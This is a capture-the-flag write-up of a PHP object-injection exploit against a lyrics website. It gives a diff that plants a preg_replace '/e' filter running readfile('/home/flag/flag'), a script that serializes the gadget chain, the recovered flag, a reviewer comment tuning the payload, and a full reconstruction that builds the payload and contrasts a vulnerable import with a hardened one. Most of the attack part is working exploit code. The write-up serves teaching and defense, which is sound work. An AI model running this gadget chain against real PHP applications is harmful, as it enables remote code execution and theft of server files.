Sometimes, the Plague leaves some of his old stuff up and running. We found a K-Pop lyrics website the Plague wrote back when he was learning to program. It was open-source, too! We believe there might be something important in /home/flag/flag. Could you get it for us?


Reviewing the code turned up a PHP object-injection (insecure deserialization) bug in the lyrics import. The sink is the OutputFilter held by LogFileFormat: its pattern and replacement are passed straight to preg_replace(), and with the deprecated `e` modifier the replacement string is evaluated as PHP code. The chain is: unserialize() builds our object graph, the Lyrics destructor runs when that deserialized object is destroyed, it calls Song->log(), which calls Logger->log(), which formats the entry through our filter and executes the replacement via preg_replace().

Let's make a small change to classes.php so that Song's constructor installs the malicious filter, serialize the resulting object and import it.

diff --git a/classes.php.orig b/classes.php
index cab4690..c0d0042 100644
--- a/classes.php.orig
+++ b/classes.php
@@ -59,7 +59,8 @@ class Song {
   function __construct($name, $group, $url) {
     $this->name = $name; $this->group = $group;
     $this->url = $url;
-    $fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
+    //$fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
+    $fltr = new OutputFilter("/(.*)/e", "readfile('/home/flag/flag')");
     $this->logger = new Logger(new LogWriter_File("song_views", new LogFileFormat(array($fltr), "\n")));
   }
   function __toString() {
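Review bot: the new `$fltr` line relies on the `e` (eval) modifier, which was deprecated in PHP 5.5 and removed in PHP 7.0; on a PHP 7+ target preg_replace() warns "Unknown modifier 'e'" and returns NULL, so nothing executes. State the target's PHP version (< 7.0) as an assumption next to the payload, and drop the commented-out original line rather than keeping both. Also, `/(.*)/e` matches the trailing empty string as well as the text, so readfile() runs more than once per log entry and its byte count becomes the logged text; an anchored pattern such as `/^.*/e` fires once.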

Serializer (serializator.php):

<?php
// Uses the patched classes.php, so Song's constructor installs the /e filter.
// Lyrics::__destruct also fires when this script exits, so the chain runs
// locally too (readfile() only warns if /home/flag/flag does not exist here).
require_once './classes.php';

$l = new Lyrics("lyrics", new Song("songname", "test", "url"));
echo base64_encode(serialize($l));
➜  kpop  php serializator.php
(base64-encoded payload omitted)

Import result:

The flag is One_of_our_favorite_songs_is_bubble_pop
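The following is an added example, not code from the challenge's classes.php (which the writeup only shows in part). It is a minimal stand-in for the whole gadget chain: the class names follow the page, but the property names, method bodies and the log path are assumptions made for illustration. It builds the same payload as serializator.php without editing classes.php (by swapping the filter after construction, assuming the logger property is writable), feeds it to a vulnerable import and to a hardened one, and shows where the destructor actually fires.

```php
<?php
// Added example: minimal reconstruction of the gadget chain. Property names,
// method bodies and the temp-dir log path are assumptions, not the app's code.

class OutputFilter {
    public $pattern, $replacement;
    function __construct($pattern, $replacement) {
        $this->pattern = $pattern; $this->replacement = $replacement;
    }
    // Sink: both arguments come from the deserialized object. With the `e`
    // modifier, PHP 5.x eval()s the replacement for every match; PHP 7+
    // rejects the modifier ("Unknown modifier 'e'") and returns NULL.
    function apply($text) {
        return preg_replace($this->pattern, $this->replacement, $text);
    }
}

class LogFileFormat {
    public $filters, $terminator;
    function __construct($filters, $terminator) {
        $this->filters = $filters; $this->terminator = $terminator;
    }
    function format($entry) {
        foreach ($this->filters as $f) { $entry = $f->apply($entry); }
        return $entry . $this->terminator;
    }
}

class LogWriter_File {
    public $name, $format;
    function __construct($name, $format) {
        $this->name = $name; $this->format = $format;
    }
    function write($entry) {
        file_put_contents(sys_get_temp_dir() . '/' . $this->name,
                          $this->format->format($entry), FILE_APPEND);
    }
}

class Logger {
    public $writer;
    function __construct($writer) { $this->writer = $writer; }
    function log($msg) { $this->writer->write($msg); }
}

class Song {
    public $name, $group, $url, $logger;
    function __construct($name, $group, $url) {
        $this->name = $name; $this->group = $group; $this->url = $url;
        $fltr = new OutputFilter("/\[i\](.*)\[\/i\]/i", "<i>\\1</i>");
        $this->logger = new Logger(new LogWriter_File("song_views",
                            new LogFileFormat(array($fltr), "\n")));
    }
    function log() { $this->logger->log("view " . $this->name); }
}

class Lyrics {
    public $lyrics, $song;
    function __construct($lyrics, $song) { $this->lyrics = $lyrics; $this->song = $song; }
    // Trigger: runs when the object is destroyed, not inside unserialize().
    function __destruct() { if ($this->song) { $this->song->log(); } }
}

// Attacker side: same object graph as serializator.php, filter swapped after
// construction. The Song is detached afterwards so the destructor does not
// run the payload in this process as well.
function buildPayload($phpCode) {
    $song = new Song("songname", "test", "url");
    $song->logger = new Logger(new LogWriter_File("song_views",
        new LogFileFormat(array(new OutputFilter("/(.*)/e", $phpCode)), "\n")));
    $l = new Lyrics("lyrics", $song);
    $blob = base64_encode(serialize($l));
    $l->song = null;
    return $blob;
}

// Vulnerable import: arbitrary classes are instantiated from user data.
function importUnsafe($b64) {
    $obj = unserialize(base64_decode($b64));
    // Lyrics::__destruct fires when $obj goes out of scope here and walks
    // Song->log -> Logger->log -> LogWriter_File->write -> LogFileFormat->format
    // -> OutputFilter->apply -> preg_replace(..., 'e').
}

// Hardened import (PHP >= 7.0): no objects are instantiated, so no destructor
// or gadget method can run, and anything but a plain array is rejected.
function importSafe($b64) {
    $data = unserialize(base64_decode($b64), ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

$payload = buildPayload("readfile('/home/flag/flag')");
importUnsafe($payload);          // PHP 5.x: prints the file; PHP 7+: warning only
var_dump(importSafe($payload));  // NULL: object graph rejected
```

Run it with `php gadget_chain.php` (file name assumed). On a PHP 5.x interpreter the unsafe import prints the flag file; on PHP 7+ the same call only emits the "Unknown modifier 'e'" warning, which is also the practical limit of the exploit against the real target. The hardened path works independently of the PHP version's regex behaviour because the gadget objects never come into existence.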